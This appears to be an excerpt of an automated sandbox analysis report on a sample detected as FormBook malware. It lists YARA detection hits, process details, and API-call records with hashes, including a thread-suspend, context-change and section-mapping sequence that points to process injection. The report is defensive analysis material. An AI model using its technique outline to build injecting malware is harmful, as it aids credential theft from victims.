                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000012.00000002.4497267348.0000000005070000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000012.00000002.4497267348.0000000005070000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                Has exited:false

                                Target ID:19
                                Start time:01:18:39
                                Start date:30/08/2024
                                Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                Imagebase:0x7ff79f9e0000
                                File size:676'768 bytes
                                MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Has exited:true


                                  Execution Graph

                                  Execution Coverage:10.1%
                                  Dynamic/Decrypted Code Coverage:100%
                                  Signature Coverage:0%
                                  Total number of Nodes:93
                                  Total number of Limit Nodes:6

                                  Control-flow Graph

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2101156033.0000000006A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A60000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6a60000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 1a[9$3X2$4'jq$TJoq$Tejq$pnq$xbmq
                                  • API String ID: 0-4226763738
                                  • Opcode ID: 15bce456b6ecd85ec61c634296ebabe1dafa804ba2665bdc8f53ce6fbf58e0fc
                                  • Instruction ID: 4ae3c7535dd3afc7894709a34795634fa63995463258aa2c5a082a7f46056c84
                                  • Opcode Fuzzy Hash: 15bce456b6ecd85ec61c634296ebabe1dafa804ba2665bdc8f53ce6fbf58e0fc
                                  • Instruction Fuzzy Hash: 6DB2D574E00628CFDB54DF69C984AD9BBB2FF89304F1581E9E509AB225DB319E81CF50

                                  Control-flow Graph

                                  APIs
                                  • GetCurrentProcess.KERNEL32 ref: 0236D05E
                                  • GetCurrentThread.KERNEL32 ref: 0236D09B
                                  • GetCurrentProcess.KERNEL32 ref: 0236D0D8
                                  • GetCurrentThreadId.KERNEL32 ref: 0236D131
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2085800551.0000000002360000.00000040.00000800.00020000.00000000.sdmp, Offset: 02360000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2360000_UnmxRI.jbxd
                                  Similarity
                                  • API ID: Current$ProcessThread
                                  • String ID:
                                  • API String ID: 2063062207-0
                                  • Opcode ID: 17a2c0805db1d3d8e76a382a37da9fb97bdfa7f8387ca6f2e9f7eff61055139f
                                  • Instruction ID: 62cca54b20547c6361f264806b6ccb4789619578baf5c0e5262a532305105e78
                                  • Opcode Fuzzy Hash: 17a2c0805db1d3d8e76a382a37da9fb97bdfa7f8387ca6f2e9f7eff61055139f
                                  • Instruction Fuzzy Hash: F35168B0A003498FDB14DFAAD548BAEBFF5EF88304F20C069D409A7360D7399945CB65

                                  Control-flow Graph

                                  APIs
                                  • GetCurrentProcess.KERNEL32 ref: 0236D05E
                                  • GetCurrentThread.KERNEL32 ref: 0236D09B
                                  • GetCurrentProcess.KERNEL32 ref: 0236D0D8
                                  • GetCurrentThreadId.KERNEL32 ref: 0236D131
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2085800551.0000000002360000.00000040.00000800.00020000.00000000.sdmp, Offset: 02360000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2360000_UnmxRI.jbxd
                                  Similarity
                                  • API ID: Current$ProcessThread
                                  • String ID:
                                  • API String ID: 2063062207-0
                                  • Opcode ID: bc721695d9296f7b56d18e56a34a3f5252cc3a1980fcfc91c0308525e65f91a7
                                  • Instruction ID: fc870ced7a22a3095b98d1fdff21f6af5adeb53781dd0123759d4a5d2735de80
                                  • Opcode Fuzzy Hash: bc721695d9296f7b56d18e56a34a3f5252cc3a1980fcfc91c0308525e65f91a7
                                  • Instruction Fuzzy Hash: 105157B09003499FDB14DFAAD548BAEBFF5EF88304F20C069D409A7360D779A944CB65

                                  Control-flow Graph

                                  APIs
                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 0236AF9E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2085800551.0000000002360000.00000040.00000800.00020000.00000000.sdmp, Offset: 02360000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2360000_UnmxRI.jbxd
                                  Similarity
                                  • API ID: HandleModule
                                  • String ID:
                                  • API String ID: 4139908857-0
                                  • Opcode ID: dee4d3911b166e90be3b0780f6e15f3e9994af1ec8860b18ba7d0df518bbacae
                                  • Instruction ID: 51d650667daf2ce9caaffbeab229bb17991415d62712877a7f5d19ca8d8923e4
                                  • Opcode Fuzzy Hash: dee4d3911b166e90be3b0780f6e15f3e9994af1ec8860b18ba7d0df518bbacae
                                  • Instruction Fuzzy Hash: BE714970A00B048FDB24DF69D45876ABBF9FF88304F00892DD486EBA54DB75E849CB91

                                  Control-flow Graph

                                  APIs
                                  • CreateActCtxA.KERNEL32(?), ref: 023659C9
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2085800551.0000000002360000.00000040.00000800.00020000.00000000.sdmp, Offset: 02360000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2360000_UnmxRI.jbxd
                                  Similarity
                                  • API ID: Create
                                  • String ID:
                                  • API String ID: 2289755597-0
                                  • Opcode ID: 3ca47a94a36895887ba80798d018cd07f6ed53960a2d57399182d1df31b1a476
                                  • Instruction ID: db537cc42717a23573a2534a48808e140c77d4067d2cdd7a7491daa0d3781c5d
                                  • Opcode Fuzzy Hash: 3ca47a94a36895887ba80798d018cd07f6ed53960a2d57399182d1df31b1a476
                                  • Instruction Fuzzy Hash: 0941E2B0C00619CBDB25CFA9C988BDDBBB5BF49304F60806AD408AB255DB766946CF50

                                  Control-flow Graph

                                  APIs
                                  • CreateActCtxA.KERNEL32(?), ref: 023659C9
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2085800551.0000000002360000.00000040.00000800.00020000.00000000.sdmp, Offset: 02360000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2360000_UnmxRI.jbxd
                                  Similarity
                                  • API ID: Create
                                  • String ID:
                                  • API String ID: 2289755597-0
                                  • Opcode ID: 1e9fdda343c1a72cb2cec9eeab1bafad454981248af5d2d9ff9f5789c108c863
                                  • Instruction ID: a60f3ed069219193cd3ebc495d9aa5b918e5a0633f3178f1c52f7653196059cc
                                  • Opcode Fuzzy Hash: 1e9fdda343c1a72cb2cec9eeab1bafad454981248af5d2d9ff9f5789c108c863
                                  • Instruction Fuzzy Hash: EE41E3B0C0071DCBDB25DFAAC848B9DBBF5BF49304F60806AD408AB255DB756946CF90

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 656 236d630-236d6c4 DuplicateHandle 657 236d6c6-236d6cc 656->657 658 236d6cd-236d6ea 656->658 657->658
                                  APIs
                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0236D6B7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2085800551.0000000002360000.00000040.00000800.00020000.00000000.sdmp, Offset: 02360000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2360000_UnmxRI.jbxd
                                  Similarity
                                  • API ID: DuplicateHandle
                                  • String ID:
                                  • API String ID: 3793708945-0
                                  • Opcode ID: 1cc2804253b79dd1ce15cc0cfecde6ca395e0a8477b2bfd966c0a04b34fa2228
                                  • Instruction ID: d86b55b94dcbcdeeafdc00a1f5673526a0ea30723b3239bb6d849764276fa1e4
                                  • Opcode Fuzzy Hash: 1cc2804253b79dd1ce15cc0cfecde6ca395e0a8477b2bfd966c0a04b34fa2228
                                  • Instruction Fuzzy Hash: 6B21C4B59002489FDB10CF9AD584AEEFBF9FB48310F14841AE918A3350D379A954CFA5

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 651 236d629-236d6c4 DuplicateHandle 652 236d6c6-236d6cc 651->652 653 236d6cd-236d6ea 651->653 652->653
                                  APIs
                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0236D6B7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2085800551.0000000002360000.00000040.00000800.00020000.00000000.sdmp, Offset: 02360000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2360000_UnmxRI.jbxd
                                  Similarity
                                  • API ID: DuplicateHandle
                                  • String ID:
                                  • API String ID: 3793708945-0
                                  • Opcode ID: e58047bf726acaef37198675e09fd8f5a8032a41b988ebe57ea5e5c51f6736b6
                                  • Instruction ID: a3084db5599b6f3f491c20f06419fbf1e6d950893db6602268c9652ef6eca0b3
                                  • Opcode Fuzzy Hash: e58047bf726acaef37198675e09fd8f5a8032a41b988ebe57ea5e5c51f6736b6
                                  • Instruction Fuzzy Hash: D921E2B5900248DFDB10CFAAD584AEEBFF9FB48314F14841AE918A7310C378A950CFA4

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 661 236a0d0-236b200 663 236b202-236b205 661->663 664 236b208-236b237 LoadLibraryExW 661->664 663->664 665 236b240-236b25d 664->665 666 236b239-236b23f 664->666 666->665
                                  APIs
                                  • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0236B019,00000800,00000000,00000000), ref: 0236B22A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2085800551.0000000002360000.00000040.00000800.00020000.00000000.sdmp, Offset: 02360000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2360000_UnmxRI.jbxd
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID:
                                  • API String ID: 1029625771-0
                                  • Opcode ID: 8b467e9d2f0484f0504a4c16f5ce15316f36711331910cdeef6eb7e4c9bdd349
                                  • Instruction ID: 564ca4382c5fba9ad8f93a1e8242e3653762b0cca9df2d45a9188d28cb5c842a
                                  • Opcode Fuzzy Hash: 8b467e9d2f0484f0504a4c16f5ce15316f36711331910cdeef6eb7e4c9bdd349
                                  • Instruction Fuzzy Hash: D31112B69003089FDB10CF9AD448AAEFBF9EB48314F10842EE519B7210C379A545CFA4

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 669 236b1b9-236b200 670 236b202-236b205 669->670 671 236b208-236b237 LoadLibraryExW 669->671 670->671 672 236b240-236b25d 671->672 673 236b239-236b23f 671->673 673->672
                                  APIs
                                  • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0236B019,00000800,00000000,00000000), ref: 0236B22A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2085800551.0000000002360000.00000040.00000800.00020000.00000000.sdmp, Offset: 02360000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2360000_UnmxRI.jbxd
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID:
                                  • API String ID: 1029625771-0
                                  • Opcode ID: a14460219cf721b327fea2a487071e106299b22f8f937cb3e7b73678aa92b8e9
                                  • Instruction ID: 57a3afcf151770327229206453d7a71b6585799a2ae5e6d62a9cb1367b46cf06
                                  • Opcode Fuzzy Hash: a14460219cf721b327fea2a487071e106299b22f8f937cb3e7b73678aa92b8e9
                                  • Instruction Fuzzy Hash: B91112B6D002098FDB10DFAAD588AEEFBF9EB48314F10841EE419B7600C379A545CFA4

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 676 236af38-236af78 677 236af80-236afab GetModuleHandleW 676->677 678 236af7a-236af7d 676->678 679 236afb4-236afc8 677->679 680 236afad-236afb3 677->680 678->677 680->679
                                  APIs
                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 0236AF9E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2085800551.0000000002360000.00000040.00000800.00020000.00000000.sdmp, Offset: 02360000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2360000_UnmxRI.jbxd
                                  Similarity
                                  • API ID: HandleModule
                                  • String ID:
                                  • API String ID: 4139908857-0
                                  • Opcode ID: 4ad6cf162872db097f3ae2151f4a92215627311c2bfa73dc9a11c32e4925e567
                                  • Instruction ID: def1dccba8dbbca68681c78e44d34fb9d0d5273a25e54263094ab4c69c209de5
                                  • Opcode Fuzzy Hash: 4ad6cf162872db097f3ae2151f4a92215627311c2bfa73dc9a11c32e4925e567
                                  • Instruction Fuzzy Hash: BE11DFB6C003498FCB10DF9AD948ADEFBF8EF88214F10845AD919B7214C379A545CFA1

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 682 6a6fce0-6a6fd4a PostMessageW 683 6a6fd53-6a6fd67 682->683 684 6a6fd4c-6a6fd52 682->684 684->683
                                  APIs
                                  • PostMessageW.USER32(?,?,?,?), ref: 06A6FD3D
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2101156033.0000000006A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A60000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6a60000_UnmxRI.jbxd
                                  Similarity
                                  • API ID: MessagePost
                                  • String ID:
                                  • API String ID: 410705778-0
                                  • Opcode ID: c77cf80f04d376317d2c44cc05b3b97731124d62d70bb945206ab37a703d6a69
                                  • Instruction ID: 4494747e1118e0da5b400675962f47bdb8a09227426ddd1fc15a95088601bce1
                                  • Opcode Fuzzy Hash: c77cf80f04d376317d2c44cc05b3b97731124d62d70bb945206ab37a703d6a69
                                  • Instruction Fuzzy Hash: 9111D3B5800349DFDB10DF9AD845BDEFBF8EB48314F108419E518A7210C379A544CFA1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2101156033.0000000006A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A60000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6a60000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: TJoq$Tejq$xbmq
                                  • API String ID: 0-903294719
                                  • Opcode ID: 73cfbb58c5e8107dfec691b13dda3c7c76bbbbdfdb388aae7061ac2b3b77e8a3
                                  • Instruction ID: c7484dda5df726e968055555ec9a7a749cd7e2a9e5f9ca046badf6cbd77ecacc
                                  • Opcode Fuzzy Hash: 73cfbb58c5e8107dfec691b13dda3c7c76bbbbdfdb388aae7061ac2b3b77e8a3
                                  • Instruction Fuzzy Hash: D7C16375E016188FDB58DF6AC944AD9BBF2BF88301F14C1A9D809AB365DB309E85CF50
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2101156033.0000000006A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A60000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6a60000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: F$P
                                  • API String ID: 0-299210802
                                  • Opcode ID: bde99f4e02d8bcac740eef1814a0ef44893d96110a2db3f6c3aacda0589aff52
                                  • Instruction ID: c908943573cb41108f2f3f7af1af9f1a86c8a92b3b6236fe3555f8217f06c597
                                  • Opcode Fuzzy Hash: bde99f4e02d8bcac740eef1814a0ef44893d96110a2db3f6c3aacda0589aff52
                                  • Instruction Fuzzy Hash: 7F4172B1E016188BEB5CCF6B8D4068AFAF3AFC9300F18C1B9950CAB215DB7105958F55
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2101156033.0000000006A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A60000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6a60000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4'jq
                                  • API String ID: 0-3676250632
                                  • Opcode ID: 9fede8f977f05228f7f8219ccc9b706c84cc7b61065a028a95cc0c4bc4439642
                                  • Instruction ID: 983a6d947db2d699669f516e4bafaf9ff1a560f81454b7b3ea3679269cea35c0
                                  • Opcode Fuzzy Hash: 9fede8f977f05228f7f8219ccc9b706c84cc7b61065a028a95cc0c4bc4439642
                                  • Instruction Fuzzy Hash: 1C6110B5E416088FDB08EFBAE94169A7FF2FF88301F14D539D005AB269DB345946CB90
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2101156033.0000000006A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A60000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6a60000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4'jq
                                  • API String ID: 0-3676250632
                                  • Opcode ID: 0172fde20595d2a51d698cb92b21263fe28fbeb8e01d85f973a4592b776ef3d7
                                  • Instruction ID: bbf99eb2228b9be944bb24740efa0c195989ae2321b522f6c0f89674249dc046
                                  • Opcode Fuzzy Hash: 0172fde20595d2a51d698cb92b21263fe28fbeb8e01d85f973a4592b776ef3d7
                                  • Instruction Fuzzy Hash: 18611FB4E416088FDB08EFAAE94079ABFF6FF88301F14D539D005AB269DB745905CB80
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2101156033.0000000006A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A60000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6a60000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: P
                                  • API String ID: 0-3110715001
                                  • Opcode ID: 6744e4e9c1106656a3d32d7d9d37b2743bcb7960ba857328d8bb38f43ea9eaf4
                                  • Instruction ID: 12dcc65eb73c8fbe1dea252ce94c31734df5a07fc8ffde18a80c0f1548865a71
                                  • Opcode Fuzzy Hash: 6744e4e9c1106656a3d32d7d9d37b2743bcb7960ba857328d8bb38f43ea9eaf4
                                  • Instruction Fuzzy Hash: 744165B1D056588FEB1DCF678D40289FBF7AFC9200F18C1BAC45CAA225DB7505568F11

                                  Execution Graph

                                  Execution Coverage:1.3%
                                  Dynamic/Decrypted Code Coverage:1.7%
                                  Signature Coverage:10.8%
                                  Total number of Nodes:409
                                  Total number of Limit Nodes:42

                                  Control-flow Graph (function at 40ad93; graph not reproduced)
                                  APIs
                                  • NtCreateFile.NTDLL(?,?,?,?,?,?,00000000,?,?,?,?), ref: 0040AF01
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2229320188.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_400000_UnmxRI.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateFile
                                  • String ID:
                                  • API String ID: 823142352-0
                                  • Opcode ID: 6c6f08a8a26e60f00a0cf3560f50c06e82be3cc100f0155c705bb3bddea5e0f9
                                  • Instruction ID: 808193d5d4fc7e1358bcd25f2ec58bb31470aa0ce63a101ad7f2c5002c2100f8
                                  • Opcode Fuzzy Hash: 6c6f08a8a26e60f00a0cf3560f50c06e82be3cc100f0155c705bb3bddea5e0f9
                                  • Instruction Fuzzy Hash: DC813DB1E04258DFCB04CFA9C890AEDBBF5AF4D304F18816AE459B7341D638A952CF95

                                  Control-flow Graph (function at 40ab63; graph not reproduced)
                                  APIs
                                  • NtMapViewOfSection.NTDLL(?,00000000,00000000,00000000,?,?,00000000,?,00407004,?,?,?,00000000), ref: 0040ACCD
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2229320188.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_400000_UnmxRI.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: SectionView
                                  • String ID:
                                  • API String ID: 1323581903-0
                                  • Opcode ID: 2595418b647e39e8cb9729be06c043157dd9df59609638f224736570bb7437b5
                                  • Instruction ID: 81c3670f9a801113ab1744733425f4ec2f53894f04874442df0eee1ccc7dde67
                                  • Opcode Fuzzy Hash: 2595418b647e39e8cb9729be06c043157dd9df59609638f224736570bb7437b5
                                  • Instruction Fuzzy Hash: FA713CB1E042589FDB04CFA9C490AEDBBF1AF8D304F18816AE859B7341D638A952CF55

                                  Control-flow Graph (function at 40afc3; graph not reproduced)
                                  APIs
                                  • NtReadFile.NTDLL(?,?,?,?,?,?,00000000,?,?), ref: 0040B129
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2229320188.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_400000_UnmxRI.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FileRead
                                  • String ID:
                                  • API String ID: 2738559852-0
                                  • Opcode ID: 1885d42dce217acca8c2b304d8ce4fae3eaa0ec178be8ae361be51d7cf531833
                                  • Instruction ID: 26c5ef9b7a87aaf3788a36da68adafc6f7274a555f62abf52eb1392f6f8e0f60
                                  • Opcode Fuzzy Hash: 1885d42dce217acca8c2b304d8ce4fae3eaa0ec178be8ae361be51d7cf531833
                                  • Instruction Fuzzy Hash: B9711DB1E04158DFCB04CFA9C891AEEBBF5AF49304F18816AE859B7341D734A941CF98

                                  Control-flow Graph (function at 40a943; graph not reproduced)
                                  APIs
                                  • NtCreateSection.NTDLL(?,00000000,000F001F,?,?,00406FC1,00000000,?,?,08000000), ref: 0040AAA1
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2229320188.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_400000_UnmxRI.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateSection
                                  • String ID:
                                  • API String ID: 2449625523-0
                                  • Opcode ID: c95e034a66444a2b019897d2a2771f6fea0de82bca183c42b18c75903f8a6577
                                  • Instruction ID: e0a1b2b7deb2ed38411ba6ee8e81e80515c1373ee109460b596f0b5dd9ca65be
                                  • Opcode Fuzzy Hash: c95e034a66444a2b019897d2a2771f6fea0de82bca183c42b18c75903f8a6577
                                  • Instruction Fuzzy Hash: A5713EB1E04258DFCB04CFA9C590AEDBBF1AF49304F18816AE859B7381D738A952CF55

                                  Control-flow Graph (function at 40b853; graph not reproduced)
                                  APIs
                                  • NtAllocateVirtualMemory.NTDLL(?,?,?,?,?,?), ref: 0040B9AD
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2229320188.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_400000_UnmxRI.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateMemoryVirtual
                                  • String ID:
                                  • API String ID: 2167126740-0
                                  • Opcode ID: e3df1edf11f7b77f187d5cbfca1df00d3f7fd211ded7433eb62b877acc962b52
                                  • Instruction ID: faeabf82201d7bcf38129071cb3f3fa61905164f8008550d8f5ed8db4af9d9e4
                                  • Opcode Fuzzy Hash: e3df1edf11f7b77f187d5cbfca1df00d3f7fd211ded7433eb62b877acc962b52
                                  • Instruction Fuzzy Hash: B2711EB1E04158DFCB05CFA9C491AEDBBF1AF49314F18806AE555B7341D738A942CF98

                                  Control-flow Graph (function at 40a103; graph not reproduced)
                                  APIs
                                  • NtGetContextThread.NTDLL(?,?), ref: 0040A24D
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2229320188.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_400000_UnmxRI.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ContextThread
                                  • String ID:
                                  • API String ID: 1591575202-0
                                  • Opcode ID: bdf3e5888329a096d66a0f5317627066ecb53849a9f42e447e9c800c43d17991
                                  • Instruction ID: 11fd44d7a11e00ebd4639afa207f627f94aff47782750b85f91d5fb369a65e0f
                                  • Opcode Fuzzy Hash: bdf3e5888329a096d66a0f5317627066ecb53849a9f42e447e9c800c43d17991
                                  • Instruction Fuzzy Hash: 3E714D70E04258DFCB04CFA9C490AEDBBF1AF49304F1880AAE455B7381D639AA51CF55
                                  APIs
                                  • NtSetContextThread.NTDLL(?,?), ref: 0040A45D
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2229320188.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_400000_UnmxRI.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ContextThread
                                  • String ID:
                                  • API String ID: 1591575202-0
                                  • Opcode ID: 83046a08d27a2416826d03a4e64bb9722fd38081ed525da0b9279bde07223586
                                  • Instruction ID: ae6af8348d5e2835efa0acd1e2774223c170520a6bccfa932cef059285a032e6
                                  • Opcode Fuzzy Hash: 83046a08d27a2416826d03a4e64bb9722fd38081ed525da0b9279bde07223586
                                  • Instruction Fuzzy Hash: 287150B4E04258DFCB04CFA9C890AEDBBF1AF49304F18806AE859B7381D738A951DF55
                                  APIs
                                  • NtDelayExecution.NTDLL(0041A851,?,?,?,00000000), ref: 0040B57E
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2229320188.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_400000_UnmxRI.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: DelayExecution
                                  • String ID:
                                  • API String ID: 1249177460-0
                                  • Opcode ID: b4c2d22bed6298bec12baf8d5aebfa4085ce205eb12ef6c928226af543862928
                                  • Instruction ID: 05c21ed3b8fbf34fef8b822d91ef9447d4cbb7e0868f63640176225ee5fd43d4
                                  • Opcode Fuzzy Hash: b4c2d22bed6298bec12baf8d5aebfa4085ce205eb12ef6c928226af543862928
                                  • Instruction Fuzzy Hash: 57712EB1E04158DFCB04CFA9D891AEDBBF1AF49304F1880AAE455B7381D738A941DF99
                                  APIs
                                  • NtResumeThread.NTDLL(004070A5,?,?,?,?), ref: 0040A66D
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2229320188.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_400000_UnmxRI.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ResumeThread
                                  • String ID:
                                  • API String ID: 947044025-0
                                  • Opcode ID: 9cb932c0315a67ac9c852c2db92a7c66480854907fabd7cd58b331431f25be41
                                  • Instruction ID: c929509a18c6c59c28b3246db7812d58a09bd30f22b7ffcb7c13801eaab6805c
                                  • Opcode Fuzzy Hash: 9cb932c0315a67ac9c852c2db92a7c66480854907fabd7cd58b331431f25be41
                                  • Instruction Fuzzy Hash: 9E717CB0E04258DFCF04CFA9C890AEDBBF1AF49304F1880AAE455B7381D639A952CF55

                                  Control-flow Graph (function at 409ef3; graph not reproduced)
                                  APIs
                                  • NtSuspendThread.NTDLL(?,?), ref: 0040A03D
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2229320188.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_400000_UnmxRI.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: SuspendThread
                                  • String ID:
                                  • API String ID: 3178671153-0
                                  • Opcode ID: eadf37b0ebc10b6c1487c18c073f48f84bb23465c486073ff16662b43e384083
                                  • Instruction ID: 20d8de7c557ead72686c067c0c30bef5db89e3c1e87048ecc75adcaa4e5a3784
                                  • Opcode Fuzzy Hash: eadf37b0ebc10b6c1487c18c073f48f84bb23465c486073ff16662b43e384083
                                  • Instruction Fuzzy Hash: 22714CB1E0425CDFCB04CFA9C890AEDBBF1AF49304F1880AAE455B7381D639A952DF55
                                  APIs
                                  • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 004175F5
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2229320188.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_400000_UnmxRI.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Load
                                  • String ID:
                                  • API String ID: 2234796835-0
                                  • Opcode ID: deaf350e4e85b77409359b01acaf9a46a1a004313a1d6a861bb488262364818c
                                  • Instruction ID: bf7d9a548e165585386690a979c625089be19cab6857ca41d1b0235f1bc70cb3
                                  • Opcode Fuzzy Hash: deaf350e4e85b77409359b01acaf9a46a1a004313a1d6a861bb488262364818c
                                  • Instruction Fuzzy Hash: 12011EB5E0420DBBDB10DAE5DC42FDEB778AB54308F00819AE90897241F635EB548BA5
                                  APIs
                                  • NtClose.NTDLL(0041A7F8,?,?,00000000,?,0041A7F8,?,?,?,?,?,?,?,?,00000000,?), ref: 0042863A
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2229320188.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_400000_UnmxRI.jbxd
